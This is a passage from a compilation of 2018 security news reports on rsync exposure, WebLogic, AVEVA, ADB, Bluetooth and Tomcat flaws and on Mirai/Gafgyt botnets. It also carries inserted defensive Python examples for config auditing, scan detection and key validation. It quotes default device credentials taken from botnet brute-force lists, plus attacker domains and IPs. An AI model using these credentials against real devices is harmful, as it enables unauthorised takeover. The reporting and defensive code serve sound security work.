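# 'hosts allow' and no 'auth users', so any client reaching port 873 can pull it.
WEAK_CONF = """\
# rsyncd.conf (constructed example)
uid = nobody
[projects]
    path = /srv/projects
    comment = customer schematics
    read only = yes
"""

# Constructed hardened variant: source network pinned, named user backed by a
# secrets file, module kept read-only and chrooted.
HARDENED_CONF = """\
# rsyncd.conf (constructed example)
uid = nobody
hosts allow = 10.20.0.0/16
hosts deny = *
[projects]
    path = /srv/projects
    comment = customer schematics
    auth users = eng-sync
    secrets file = /etc/rsyncd.secrets
    read only = yes
    use chroot = yes
"""

_SECTION = re.compile(r"^\[(?P<name>[^\]]+)\]$")


def parse_rsyncd_conf(text: str) -> Dict[str, Dict[str, str]]:
    """Minimal rsyncd.conf parser: {module: {param: value}}, with global
    parameters stored under the empty module name.  Parameter names are
    lower-cased with whitespace collapsed ('Hosts  Allow' -> 'hosts allow')."""
    sections: Dict[str, Dict[str, str]] = {"": {}}
    current = ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        m = _SECTION.match(line)
        if m:
            current = m["name"].strip()
            sections.setdefault(current, {})
            continue
        key, sep, value = line.partition("=")
        if sep:
            sections[current][" ".join(key.lower().split())] = value.strip()
    return sections


def _is_true(value: str) -> bool:
    return value.strip().lower() in ("yes", "true", "1")


def audit_rsyncd(text: str) -> Dict[str, List[str]]:
    """Return {module: [findings]}.  Module parameters override global ones,
    which is how the daemon itself applies them."""
    conf = parse_rsyncd_conf(text)
    report: Dict[str, List[str]] = {}
    for module, params in conf.items():
        if module == "":
            continue
        eff = {**conf[""], **params}
        findings: List[str] = []
        if not eff.get("hosts allow"):
            findings.append("no 'hosts allow': any source IP may connect")
        if not eff.get("auth users"):
            findings.append("no 'auth users': module is readable anonymously")
        elif not eff.get("secrets file"):
            findings.append("'auth users' set without a 'secrets file'")
        if "read only" in eff and not _is_true(eff["read only"]):
            findings.append("'read only' disabled: clients may write to the module")
        report[module] = findings
    return report


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(label, audit_rsyncd(conf))
```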

“This is the same type of administrative error we continue to see over and over again both on-premise as well as in the cloud. Until organizations wholly operationalize security into their development lifecycle, we will likely continue to see similar data exposure from non-malicious insiders,” Matt Chiodi, VP of Cloud Security at RedLock, told SecurityWeek in an emailed commentary.

Discovered on July 1, 2018, the exposed rsync server was established to belong to Level One several days later. The company was successfully notified of the issue on July 9 and closed the exposure by the next day.

“The fact that this kind of breach happened and data from so many big players was involved goes to show that anyone can be a victim if third parties are not continuously vetted. It is no longer enough for companies to maintain trust through a one-time or annual audit. Big players should demand a transparent and ongoing demonstration of security controls in action,” James Lerud, head of the Behavioral Research Team at Verodin, said in an emailed commentary.


Recently Patched Oracle WebLogic Flaw Exploited in the Wild
24.7.2018 securityweek Vulnerability

At least two threat groups have started exploiting a critical Oracle WebLogic vulnerability patched earlier this month. The attacks began shortly after several proof-of-concept (PoC) exploits were made public.

The vulnerability, tracked as CVE-2018-2893 and assigned a CVSS score of 9.8, allows an unauthenticated attacker to remotely take control of a WebLogic Server. The flaw affects the product’s WLS Core Components subcomponent and it can be exploited via the T3 transport protocol.

The security hole impacts versions 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3, and it was addressed by Oracle with its July 2018 Critical Patch Update (CPU).

Oracle has credited five different researchers for independently reporting the flaw, and one of the experts already claims to have found a way to bypass the vendor’s patch.

Shortly after Oracle announced the latest security updates on July 18, several individuals released PoC exploits on GitHub and other websites.

The Netlab group at Chinese security company Qihoo 360 reported seeing the first attacks on July 21. The campaign used luoxkexp[.]com as its main command and control (C&C) server.

According to NetLab, the domain was registered in March 2017 and hackers have been using it ever since. The group that owns the domain, tracked by NetLab as luoxk, has been using it for campaigns involving DDoS bots, RATs, cryptocurrency mining, malicious Android APKs, and worm-style exploits with the Java RMI (Remote Method Invocation) service.

In the attacks involving CVE-2018-2893, the hackers delivered the XMRig Monero miner and the Bill Gates DDoS malware.

SANS has also tracked attacks exploiting CVE-2018-2893 and the organization has seen attempts to install what appears to be a backdoor.

It’s not uncommon for malicious actors to target Oracle WebLogic vulnerabilities in their attacks, with several campaigns spotted over the past months.

While Oracle has been busy developing patches for these flaws, researchers have managed to find ways to bypass the fixes.



Cybersecurity, Compliance Slowing U.S. Government's Digital Transformation
24.7.2018 securityweek BigBrothers

Complex Compliance Requirements are Delaying U.S. Government's Digital Transformation, Study Shows

With trust in the U.S. government at an all-time low (the Pew Research Center says that only 3% of Americans trust Washington to do the right thing 'just about always'), the suggestion is that a new 'moonshot moment' is necessary for government. A new report (PDF) says that moment is possible with digital transformation.

Success, however, is dependent on three requirements: federal agencies must create a culture of innovation; must prioritize the citizen experience; and must implement an integrated approach to digital transformation.

Consulting firm ICF employed Wakefield Research to survey 500 federal employees to understand the opportunities and obstacles for federal digital transformation. The prize, says ICF, is reigniting citizen trust and satisfaction in government, regardless of the administration. Cybersecurity and compliance issues are among the greatest of the obstacles, with user satisfaction an additional problem.

Eighty-nine percent of the respondents said that security and privacy requirements significantly delay technological innovation. More than half of the respondents admitted to experiencing a cybersecurity incident after implementing a new digital initiative, while almost half of those said that the incident delayed future innovation.

The federal IT procurement process is also an inhibitor, with 91% of respondents saying it needs to be completely overhauled. More than 30% go so far as to recognize benefits in using unauthorized technologies that have not been officially sanctioned by the IT department.

ICF believes that the combination of security/compliance concerns and strict procurement policy is inhibiting the creativity of federal agencies. "Creating a culture of innovation," says the report, "requires encouraging staff within agencies to think outside the box and empowering them to follow through on new ideas by providing targeted support."

Baris Yener, an SVP at ICF, told SecurityWeek, "Compliance has become an overly-complex aspect of security in the government. This is due primarily to the fact that the public sector thinks of security as an afterthought, something that is tacked on to existing processes, rather than building solutions with a security-first mindset. Compliance will remain a hindrance," he added, "until the government and its agencies embrace a shift in thinking that prioritizes an integrated approach to creating tools and services. Once that shift takes place, and stakeholders from across departments are brought together, compliance will be simpler."

In the meantime, he does not believe that empowering creativity will necessarily lead to an unacceptable expansion of shadow IT within federal agencies.

"By embracing outside-the-box thinking, and fostering a culture that encourages creativity," he said, "those staff members will instead raise their hand to offer new solutions, rather than turn to shadow IT. Creative thinking needs to be nurtured and rewarded. If there's anything we know about the nature of cybersecurity today, it's that the threat landscape is constantly changing. Feds with a different perspective will be critical to navigating uncharted territory."

Essential to the moonshot moment of digital transformation is user engagement with the outcome. Ninety-seven percent of the survey respondents say that government agencies now have a greater responsibility than ever to provide the digital tools and services that will make a positive difference in citizens' lives. But 80% also said that government is prioritizing perfecting the technology over the citizen experience.

The extent to which regulations affect new digital technology can be seen by 44% of respondents claiming that compliance is the biggest priority when implementing a new digital technology, with 36% saying that speed of implementation is the prime priority. User adoption of that technology ranks second to last (30%), worsened only by the ability to measure its success (23%).

With such driving principles, ICF sees little chance of government maximizing the potential for engaging the trust of citizens. Federal staff accept the problem, with 92% suggesting that improving usability of the technology should be prioritized over technology development. "Instead of looking to the private sector primarily for technology solutions," suggests ICF, "federal leaders must implement user research and feedback loops that are designed to create and improve digital services."

This may seem a little surprising, since the issue of usability is understood and being tackled by new technologies in the private sector. The big development is the increasing use of artificial intelligence -- for example in reducing user friction in access control. However, Yener does not believe that such solutions can simply be transposed to the federal sector.

"For example," he told SecurityWeek, "when implementing new technologies like AI, the government needs to consider how to identify and document the standardization of those technologies, along with how it will be used within all agencies. Private sector by comparison has the freedom and flexibility to implement whatever would be beneficial to the business, with minimal standardization required or concern for other companies in their industry."

If project funding is available, the biggest obstacles to new digital developments are security concerns (41%), outdated policies (28%), skilled staff shortages (27%), complexity (22%), and lack of time (22%). Other obstacles include poor inter-office communication, difficulty in procuring services, and lack of support from senior management.

"To develop an integrated approach to digital transformation," says the report, "agencies should build a multidisciplinary team that executes technology implementation and prioritizes user adoption. Leaders need to ensure that every department -- including common omissions like HR -- is represented to better understand the needs of the entire organization as it works to apply digital transformation." Successful digital transformation, it adds, "will position the federal government to launch its next moonshot: digital transformation that reignites citizen trust and satisfaction in the government -- regardless of the administration."


AVEVA Patches Critical Flaws in HMI/SCADA Tools Following Schneider Merger
24.7.2018 securityweek Vulnerability

UK-based industrial software company AVEVA has patched two critical remote code execution vulnerabilities discovered by researchers in its InTouch and InduSoft development tools.

AVEVA merged with Schneider Electric earlier this year and took over the France-based industrial giant’s Avantis and Wonderware brands. The Wonderware portfolio includes the InduSoft Web Studio and InTouch Machine Edition HMI/SCADA software.

George Lashenko, a researcher with industrial cybersecurity firm CyberX, discovered that some versions of InTouch 2014 and 2017 are affected by a critical stack-based buffer overflow vulnerability. The flaw is tracked as CVE-2018-10628 and it has been assigned a CVSS score of 9.8.

“InTouch provides the capability for an HMI client to read and write tags defined in a view. A remote unauthenticated user could send a carefully crafted packet to exploit a stack-based buffer overflow vulnerability with potential for code to be executed while performing a tag-write operation on a locale that does not use a dot floating point separator. The code would be executed under the privileges of the InTouch View process and could lead to a compromise of the InTouch HMI,” AVEVA wrote in its advisory.

David Atch, VP of research at CyberX, told SecurityWeek that the vulnerability can be exploited remotely from the Internet if the targeted system is exposed to the Web. The attacker can take control of the HMI by directly sending it specially crafted packets, but the attack can also involve a piece of malware designed to send the malicious packets to the HMI.

“This provides the attacker with full control of the ICS process, enabling them to manipulate process parameters and potentially cause destructive actions like allowing pressure or temperature in a mixing tank to rise above acceptable levels,” Atch explained.

AVEVA released InTouch 2017 Update 2 HF-17_2 /CR149706 and InTouch 2014 R2 SP1 HF-11_1_SP1 /CR149705 on July 13 to patch the vulnerability.


Separately, researchers at Tenable discovered another critical remote code execution vulnerability. The security hole, tracked as CVE-2018-10620 with a CVSS score of 9.8, impacts both InTouch Machine Edition and InduSoft Web Studio.

“InduSoft Web Studio and InTouch Machine Edition provide the capability for an HMI client to read, write tags and monitor alarms and events. A remote user could send a carefully crafted packet to exploit a stack-based buffer overflow vulnerability during tag, alarm, or event related actions such as read and write, with potential for code to be executed. The code would be executed under the privileges of the Indusoft Web Studio or InTouch Machine Edition runtime and could lead to a compromise of the InduSoft Web Studio or InTouch Machine Edition server machine,” AVEVA said in its advisory.

The company patched the flaw on July 13 with the release of Hotfix 81.1.00.08 for each of the impacted products.

“These vulnerabilities leave InduSoft Web Studio or InTouch Machine Edition server machines vulnerable to an unauthenticated remote attacker who could leverage them to execute arbitrary code, potentially leading to full system compromise. In turn, these machines could allow an attacker to move laterally within a network. Connected HMI clients and OT devices can also be exposed to attacks,” Tenable said in a blog post, which includes technical details and a PoC exploit.

The flaw is similar to one disclosed by Tenable in early May, but it’s triggered via a different command.


Security Orchestration Firm Siemplify Raises $14 Million
24.7.2018 securityweek IT

Siemplify, a New York, NY-based provider of security orchestration, automation and response (SOAR) tools, today announced that it has raised $14 million in a Series B funding round led by Jump Capital.

This latest funding brings the total amount raised by the company to $28 million.

Designed to help security operations teams work more efficiently, Siemplify’s platform assists with tasks ranging from incident triage and investigation to collaboration and remediation.

“SOAR enables the management of disparate cybersecurity tools - including SIEM, endpoint protection, threat intelligence and more - through a single platform that helps security operations teams respond to threats faster and more effectively,” the company explains.

Jump Capital was joined by the company’s existing investors G20 Ventures and 83North in the Series B round.

Siemplify is yet another cybersecurity startup founded by former Israeli Defense Forces (IDF) security experts.


Android Debugging Tools Also Useful for Compromising Devices, Mining Cryptocurrency
24.7.2018 securityaffairs Android  Cryptocurrency

It is common for developers to use debugging tools with elevated privileges while they are trying to troubleshoot their code. But crooks can abuse them too.
In an ideal world, all of the security controls are applied and all of the debugging tools are removed or disabled before the code is released to the public. In reality, devices are sometimes released in a vulnerable state without the end users’ knowledge.

Based upon recent spikes in scans of TCP port 5555, someone believes that there is an exploitable vulnerability out there.

The Android software development kit (SDK) provides a tool for developers to debug their code called the Android Debug Bridge (adb). According to the Google developer portal,

“The adb command facilitates a variety of device actions, such as installing and debugging apps, and it provides access to a Unix shell that you can use to run a variety of commands on a device.”

These are very powerful debugging functions, and they are also useful for executing malicious code without being caught by the usual security controls. As long as the adb tool is used in a secured environment, it presents little risk. It is recommended that the adb service be disabled before devices are released to consumers, and it is common for the adb service to be restricted to USB connectivity only.

In early June, security researcher Kevin Beaumont warned that, “Unfortunately, vendors have been shipping products with Android Debug Bridge enabled. It listens on port 5555, and enables anybody to connect over the internet to a device. It is also clear some people are insecurely rooting their devices, too.” He went on to describe the types of Android-based devices that were found to be in a vulnerable state and accessible from the Internet: “[…] we’ve found everything from tankers in the US to DVRs in Hong Kong to mobile telephones in South Korea. As an example, a specific Android TV device was also found to ship in this condition.” It took only one month from this warning until researchers at Trend Micro identified suspicious port scans on TCP port 5555.

According to the Trend Micro blog, “We found a new exploit using port 5555 after detecting two suspicious spikes in activity on July 9-10 and July 15. […] Our data shows that the first wave of network traffic came mainly from China and the US, while the second wave primarily involved Korea.”


The Trend Micro researchers’ analysis shows a fairly typical command & control (C&C) malware infection process with many similarities to the Satori variant of the Mirai botnet. Once an open adb port is identified, the malware drops a stage 1 shell script onto the device which, when launched, downloads two additional (stage 2) shell scripts which then download the “next stage binary for several architectures and launch the corresponding one.” The binary establishes a connection to the C&C server, then scans processes running on the compromised device and attempts to kill any that are running the CoinHive script that could be mining Monero. At the same time, the binary attempts to spread to other devices as a worm.

It isn’t clear what the intent for the compromised devices is. Analysis of the code indicates that it could be used as a distributed denial of service (DDoS) platform if enough devices are compromised. Since it appears to be killing Monero mining processes, the compromised devices could be retasked to mine cryptocurrency for a different group. After Kevin Beaumont’s warning in June, IoT search engine Shodan added the ability to search for adb vulnerable systems and currently lists over 48,000 potentially vulnerable devices.
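An added example (not Trend Micro's code or the researchers') of the kind of spike detection described above: constructed netfilter-style firewall log lines are counted per day for TCP port 5555, and a day is flagged when its count jumps well above the median of the preceding days. Log lines, hostnames and addresses are constructed; the function names are my own.

```python
"""Added example (not Trend Micro's code): flag days on which connection
attempts to TCP/5555 jump well above the recent baseline, the kind of spike
the article describes.  Log lines, hosts and addresses are constructed."""
import re
import statistics
from typing import Dict, Iterable, List

# Fields we need from netfilter-style LOG lines, e.g.
#   "Jul  9 03:02:44 gw kernel: [fw] IN=eth0 SRC=... PROTO=TCP SPT=... DPT=5555 SYN"
_LOG = re.compile(
    r"^(?P<mon>[A-Z][a-z]{2})\s+(?P<day>\d{1,2})\s+\S+\s+.*?"
    r"\bPROTO=(?P<proto>[A-Za-z0-9]+)\b.*?\bDPT=(?P<dpt>\d+)\b"
)


def constructed_log() -> List[str]:
    """Constructed sample: a quiet background of 2-3 probes a day, then two
    days of heavy scanning of port 5555, plus one unrelated SSH probe per day."""
    per_day = {"Jul 5": 2, "Jul 6": 3, "Jul 7": 2, "Jul 8": 3, "Jul 9": 40, "Jul 10": 55}
    lines: List[str] = []
    for day, count in per_day.items():
        mon, d = day.split()
        for i in range(count):
            lines.append(
                f"{mon} {int(d):2d} {i % 24:02d}:{i % 60:02d}:00 gw kernel: [fw] IN=eth0 "
                f"SRC=198.51.100.{i % 250 + 1} DST=203.0.113.10 PROTO=TCP "
                f"SPT={40000 + i} DPT=5555 SYN"
            )
        lines.append(
            f"{mon} {int(d):2d} 12:00:00 gw kernel: [fw] IN=eth0 SRC=192.0.2.5 "
            f"DST=203.0.113.10 PROTO=TCP SPT=51000 DPT=22 SYN"
        )
    return lines


def daily_port_counts(lines: Iterable[str], port: int = 5555) -> Dict[str, int]:
    """Count TCP connection attempts to `port` per calendar day.  Days are kept
    in the order they first appear in the log, i.e. chronologically, and a day
    with log lines but no hits on the port is recorded as zero."""
    counts: Dict[str, int] = {}
    for line in lines:
        m = _LOG.match(line)
        if not m:
            continue
        day = f"{m['mon']} {int(m['day'])}"
        counts.setdefault(day, 0)
        if m["proto"].upper() == "TCP" and int(m["dpt"]) == port:
            counts[day] += 1
    return counts


def find_spikes(daily: Dict[str, int], factor: float = 5.0, min_history: int = 3) -> List[str]:
    """Flag a day whose count is at least `factor` times the median of all
    earlier days; the first `min_history` days only seed the baseline."""
    flagged: List[str] = []
    history: List[int] = []
    for day, n in daily.items():
        if len(history) >= min_history:
            baseline = max(statistics.median(history), 1.0)
            if n >= factor * baseline:
                flagged.append(day)
        history.append(n)
    return flagged


def detect_adb_scan_spikes(lines: Iterable[str]) -> List[str]:
    """Days on which probes of the adb port stand out against the baseline."""
    return find_spikes(daily_port_counts(lines))


if __name__ == "__main__":
    print(detect_adb_scan_spikes(constructed_log()))   # ['Jul 9', 'Jul 10']
```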

The Trend Micro researchers offer a few suggestions to reduce your risk:

On your mobile device, go to Settings, select “Developer Options” and ensure that “ADB (USB) debugging” and “Apps from Unknown Sources” are turned off
Apply recommended patches and updates from the vendor
Perform a factory reset to erase the malware if you believe you are infected
Update intrusion prevention systems (IPS) to identify and block potentially malicious code before it reaches your device

The Android operating system was developed to run on a wide variety of devices. It is a flexible and complex solution that has encouraged a wide range of vendors to implement solutions based on Android. Some of these vendors have robust quality assurance processes in place and their solutions are “safe” while others allow mistakes to slip through the process and allow the vulnerabilities to land in the hands of end users. These users often aren’t aware of what operating system their devices are running and have no idea what vulnerabilities may exist until it is too late. It appears there are at least 48,000 examples of this waiting to be exploited.


DHS – Russian APT groups are inside US critical infrastructure
24.7.2018 securityaffairs APT

The US Government is warning of continued intrusions into national critical infrastructure and is blaming the Kremlin for the cyber attacks.
According to the US Department of Homeland Security, Russia’s APT groups have already penetrated America’s critical infrastructure, especially power utilities, and are still targeting them.
These attacks could have dramatic consequences; an attack against a power grid could cause a massive power outage.

It isn’t science fiction; it has already happened in Ukraine, and security experts blamed the Russian APT groups tracked as Dragonfly and Energetic Bear.

According to the government experts, the hackers were also able to penetrate air-gapped networks.

The Wall Street Journal quoted Homeland Security officials reporting various attacks.

“Hackers working for Russia claimed “hundreds of victims” last year in a long-running campaign that put them inside the control rooms of U.S. electric utilities where they could have caused blackouts, federal officials said.” states the WSJ.

The officials maintain that the Energetic Bear APT has already penetrated “hundreds” of systems in national power grids.

The DHS issued several alerts related to the APT attacks and shared technical details about their TTPs, including Indicators of Compromise (IOCs) to detect their presence in the IT infrastructure.

Cyber intrusions into critical infrastructure are part of a long-term information warfare strategy.

Russian APT groups carried out spear-phishing attacks against utilities’ equipment vendors and subcontractors to gather intelligence and collect the information needed to penetrate the infrastructure.

The hackers aim to exploit the access into the utilities that equipment makers and suppliers use for ordinary maintenance and telemetry. That access could allow them to deploy malware into the facilities.

Unfortunately, the attacks are still ongoing, and much critical infrastructure is operated by private companies with poor cyber hygiene.

Unfortunately, in many cases, the operators are entirely unaware of the attackers’ presence in their networks.

“They got to the point where they could have thrown switches,” Jonathan Homer, chief of industrial control system analysis for Homeland Security, told the paper.


Bluetooth Vulnerability Allows Traffic Monitoring, Manipulation
24.7.2018 securityweek Vulnerability

A high severity vulnerability affecting some Bluetooth implementations can allow an attacker in physical proximity of two targeted devices to monitor and manipulate the traffic they exchange. Some of the impacted vendors have already released patches.

The flaw, discovered by researchers at the Israel Institute of Technology and tracked as CVE-2018-5383, is related to the Secure Simple Pairing and LE Secure Connections features.

According to the Bluetooth Special Interest Group (SIG), whose members maintain and improve the technology, Bluetooth specifications recommend that devices supporting the two features validate the public key received during the pairing process. However, this is not a requirement and some vendors’ Bluetooth products do not perform public key validation.

An unauthenticated attacker who is in Bluetooth range of the targeted devices during the pairing process can launch a man-in-the-middle (MitM) attack and obtain the encryption key, which allows them to intercept traffic and forge or inject device messages.

“The attacking device would need to intercept the public key exchange by blocking each transmission, sending an acknowledgement to the sending device, and then injecting the malicious packet to the receiving device within a narrow time window. If only one device had the vulnerability, the attack would not be successful,” the Bluetooth SIG explained.
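As an added example (not code from the article, the researchers or the Bluetooth SIG), the public key validation step the specification recommends, written in Python for the P-256 curve used by LE Secure Connections: a received pairing public key is checked to be in range, on the curve and of the expected order before it is used in the Diffie-Hellman exchange. The curve constants are the published NIST P-256 domain parameters; all function names are my own.

```python
"""Added example: full public key validation for the P-256 ECDH public key
used by Bluetooth LE Secure Connections.  Skipping this check is the gap
behind CVE-2018-5383.  Not code from the article or the Bluetooth SIG."""
from dataclasses import dataclass
from typing import Optional, Tuple

Point = Optional[Tuple[int, int]]   # None stands for the point at infinity


@dataclass(frozen=True)
class Curve:
    p: int    # prime field modulus
    a: int    # curve coefficient a  (y^2 = x^3 + a*x + b)
    b: int    # curve coefficient b
    n: int    # order of the base point (cofactor 1 for P-256)
    gx: int   # base point x
    gy: int   # base point y


# Published NIST P-256 domain parameters
P256 = Curve(
    p=0xffffffff00000001000000000000000000000000ffffffffffffffffffffffff,
    a=0xffffffff00000001000000000000000000000000fffffffffffffffffffffffc,
    b=0x5ac635d8aa3a93e7b3ebbd55769886bc651d06b0cc53b0f63bce3c3e27d2604b,
    n=0xffffffff00000000ffffffffffffffffbce6faada7179e84f3b9cac2fc632551,
    gx=0x6b17d1f2e12c4247f8bce6e563a440f277037d812deb33a0f4a13945d898c296,
    gy=0x4fe342e2fe1a7f9b8ee7eb4a7c0f9e162bce33576b315ececbb6406837bf51f5,
)


def on_curve(c: Curve, x: int, y: int) -> bool:
    """True when (x, y) satisfies the curve equation modulo p."""
    return (y * y - (x * x * x + c.a * x + c.b)) % c.p == 0


def point_add(c: Curve, P: Point, Q: Point) -> Point:
    """Affine point addition; only safe for points already known to be on the curve."""
    if P is None:
        return Q
    if Q is None:
        return P
    x1, y1 = P
    x2, y2 = Q
    if x1 == x2 and (y1 + y2) % c.p == 0:
        return None                       # P + (-P) = infinity
    if P == Q:
        lam = (3 * x1 * x1 + c.a) * pow(2 * y1, -1, c.p) % c.p
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, c.p) % c.p
    x3 = (lam * lam - x1 - x2) % c.p
    y3 = (lam * (x1 - x3) - y1) % c.p
    return (x3, y3)


def scalar_mult(c: Curve, k: int, P: Point) -> Point:
    """Double-and-add scalar multiplication k*P."""
    R: Point = None
    while k:
        if k & 1:
            R = point_add(c, R, P)
        P = point_add(c, P, P)
        k >>= 1
    return R


def validate_public_key(c: Curve, x: int, y: int) -> bool:
    """Full validation in the style of NIST SP 800-56A: coordinates in range,
    point on the curve, not the point at infinity, and of order n."""
    if not (0 <= x < c.p and 0 <= y < c.p):
        return False
    if not on_curve(c, x, y):
        return False
    return scalar_mult(c, c.n, (x, y)) is None


def accept_peer_public_key(c: Curve, x: int, y: int) -> Tuple[int, int]:
    """What a patched pairing implementation does before running ECDH on a
    peer key: reject anything that fails validation instead of deriving a
    shared secret from an attacker-chosen off-curve point."""
    if not validate_public_key(c, x, y):
        raise ValueError("peer public key rejected: invalid point for the curve")
    return (x, y)


if __name__ == "__main__":
    g = (P256.gx, P256.gy)
    print("generator valid:", validate_public_key(P256, *g))              # True
    print("tampered y valid:", validate_public_key(P256, g[0], g[1] + 1))  # False
```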

Additional technical details about the vulnerability and attack method were made public on Monday by CERT/CC.

The Bluetooth SIG says it has now updated specifications to require products to validate public keys. The organization has also added testing for this vulnerability to its Bluetooth Qualification Process, which all products that use Bluetooth must complete.

“There is no evidence that the vulnerability has been exploited maliciously and the Bluetooth SIG is not aware of any devices implementing the attack having been developed, including by the researchers who identified the vulnerability,” the Bluetooth SIG said.

Apple and Intel have already rolled out patches for this vulnerability. Apple fixed CVE-2018-5383 in the past weeks with the release of macOS High Sierra 10.13.5, iOS 11.4, watchOS 4.3.1, and tvOS 11.4.

Intel published an advisory on Monday, informing users that the high severity flaw impacts its Dual Band Wireless-AC, Tri-Band Wireless-AC and Wireless-AC product families. The company has released both software and firmware updates to patch the security hole, and provided instructions on how to address the issue on Windows, Linux and Chrome OS systems.

Broadcom says some of its products using Bluetooth 2.1 or newer may be impacted, but it claims to have already made fixes available to its OEM customers. It’s now up to these companies to ensure that the patches reach end users.

CERT/CC’s advisory also lists Qualcomm as being affected, but the company has yet to provide any information.


EU Antitrust Officials Probe Thales, Gemalto Merger
24.7.2018 securityweek  BigBrothers

The European Union said Monday it has launched an anti-trust investigation into the planned purchase by French aerospace and defence group Thales of SIM manufacturer Gemalto.

The European Commission, the 28-nation EU's executive arm, said it wants to determine whether the merger will increase prices as well as reduce choice and innovation for customers of hardware security modules (HSM).

An HSM is hardware that runs on encryption software to "generate, protect, and manage encryption keys used to protect data in a secure, tamper-resistant module," it said.

"Our society is increasingly dependent on data security solutions to secure all sorts of social, commercial or personal information," the EU's competition commissioner Margrethe Vestager said in a statement.

"We are opening this in-depth investigation to ensure that the proposed transaction between Thales and Gemalto would not lead to higher prices or less choice in hardware security modules for customers looking to safely encrypt their data," Vestager added.

In a deal valued at about 4.8 billion euros, Thales agreed in December to buy Gemalto, based in the Netherlands, outbidding French competitor Atos.

With the merger, Thales is aiming to become a global leader in digital security.

The Commission expressed concern that the merger would reduce the number of players in the market.

Gemalto is active in mobile platforms and services, mobile embedded software and products, smart cards, identification documents, government programs, machine to machine communication, and enterprise security.

The Commission said it has until 29 November to take a decision.


Information Disclosure, DoS Flaws Patched in Apache Tomcat
24.7.2018 securityweek Vulnerability

The Apache Software Foundation informed users over the weekend that updates for the Tomcat application server address several vulnerabilities, including issues that can lead to information disclosure and a denial-of-service (DoS) condition.

Apache Tomcat is an open source implementation of the Java Servlet, JavaServer Pages (JSP), Java WebSocket and Java Expression Language technologies. Tomcat is the most widely used web application server, with a market share of over 60 percent.

One of the more serious flaws, CVE-2018-8037, impacts Tomcat versions 9.0.0.M9 through 9.0.9 and 8.5.5 through 8.5.31. Patches are included in Tomcat 9.0.10 and 8.5.32.

The vulnerability, rated “important,” has been described by the Apache Software Foundation as an information disclosure issue caused by a bug in the tracking of connection closures that can lead to user sessions getting mixed up.

Another security hole rated “important” is CVE-2018-1336, a bug in the UTF-8 decoder that can lead to a DoS condition. The flaw affects Tomcat versions 7.0.x, 8.0.x, 8.5.x and 9.0.x, and it has been resolved with the release of versions 9.0.7, 8.5.32, 8.0.52 and 7.0.90.

“An improper handling of overflow in the UTF-8 decoder with supplementary characters can lead to an infinite loop in the decoder causing a Denial of Service,” the Apache Software Foundation said in its advisory.

The latest Tomcat 7.0.x, 8.0.x, 8.5.x and 9.0.x releases also patch a low severity security constraints bypass issue tracked as CVE-2018-8034.

“The host name verification when using TLS with the WebSocket client was missing. It is now enabled by default,” reads the advisory for this vulnerability.

US-CERT has also released an alert, recommending that users review the Apache advisories and apply the updates.

Apache Tomcat vulnerabilities are less likely to be exploited in the wild. There was a worm targeting Apache Tomcat servers a few years ago, but it leveraged common username and password combinations rather than exploiting any vulnerabilities.

The Apache Software Foundation also informed customers last week of vulnerabilities impacting Apache Ignite, an open source memory-centric distributed database, caching, and processing platform. Ignite is currently ranked 66 by DB-Engines.

Ignite is impacted by two security holes, both of which could lead to arbitrary code execution.


Experts warn of new campaigns leveraging Mirai and Gafgyt variants
24.7.2018 securityaffairs BotNet

Security experts are warning of an intensification of attacks powered by two notorious IoT botnets, Mirai and Gafgyt.
Security experts are warning of a new wave of attacks powered by two botnets, Mirai and Gafgyt.

Since the code of the infamous Mirai botnet was leaked online, many variants have emerged in the threat landscape. Satori, Masuta, Wicked Mirai, JenX, Omni, and the OMG botnet are just the latest variants to appear online in 2018.

The Gafgyt botnet, also known as Bashlite and Lizkebab, first appeared in the wild in 2014, and its source code was leaked in early 2015.

In September 2016, joint research conducted by Level 3 Communications and Flashpoint allowed the identification of a million devices infected by the BASHLITE malware.

“The end of May 2018 has marked the emergence of three malware campaigns built on publicly available source code for the Mirai and Gafgyt malware families that incorporate multiple known exploits affecting Internet of Things (IoT) devices.” reads the analysis published by PaloAlto Network.

“Samples belonging to these campaigns incorporate as many as eleven exploits within a single sample, beating the IoT Reaper malware, which borrowed some of the Mirai source code but also came with an integrated LUA environment that incorporated nine exploits in its code.”

The latest variants of both bots include code to target the D-Link DSL-2750B OS command injection flaw; experts noticed that this new feature was implemented only a few weeks after the publication, on May 25, of the Metasploit module for its exploitation.

According to the experts, the two attacks appear to be linked.

The first campaign spotted by the experts is associated with the Omni bot, one of the latest variants of the Mirai malware. The Omni bot includes a broad range of exploits, such as the code to trigger two vulnerabilities (CVE-2018-10561 and CVE-2018-1562) in Dasan GPON routers, a flaw in Huawei routers tracked as CVE-2017-17215, two command execution issues in D-Link devices, vulnerabilities in Vacron NVR devices, a remote code execution in CCTVs and DVRs from over 70 vendors, and a JAWS Webserver command execution.

“All of these vulnerabilities are publicly known and have been exploited by different botnets either separately or in combination with others in the past, however, this is the first Mirai variant using all eleven of them together.” continues the report published by PaloAlto.

The campaign leverages two different encryption schemes; the bot propagates only via exploits and prevents further infection of compromised devices by dropping packets received on certain ports using iptables.

The latest Mirai variant uses the IP 213[.]183.53.120 both for serving payloads and as a Command and Control (C2) server; the same address was also used by some Gafgyt samples.

A second campaign observed by the researchers used the same exploits as the first one, but also attempted to carry out credential brute-force attacks.

The campaign was named Okane after the binaries downloaded by the shell script used to replicate itself.

“Unlike the previous campaign, these samples also perform a credential brute force attack.” continues the analysis.

“Some unusual entries were discovered on the brute force lists in these samples, such as the following:

root/t0talc0ntr0l4! – default credentials for Control4 devices
admin/adc123 – default credentials for ADC FlexWave Prism devices
mg3500/merlin – default credentials for Camtron IP cameras
Some samples belonging to this campaign include the addition of two new DDoS methods to the Mirai source code.”


Experts at PaloAlto Networks observed a third campaign, tracked as Hakai, that attempted to infect devices with the Gafgyt malware using all the exploit code of the previous campaigns, except for the UPnP SOAP TelnetD Command Execution exploit.

Further details about the campaigns, including IoCs, are included in the post published by PaloAlto.


SpectreRSB – new Spectre CPU side-channel attack using the Return Stack Buffer
24.7.2018 securityaffairs Attack

Researchers from the University of California, Riverside (UCR) have devised a new Spectre CPU side-channel attack called SpectreRSB.
SpectreRSB leverages the speculative execution technique implemented by most modern CPUs to optimize performance.

Unlike other Spectre attacks, SpectreRSB recovers data from the speculative execution process by targeting the Return Stack Buffer (RSB).

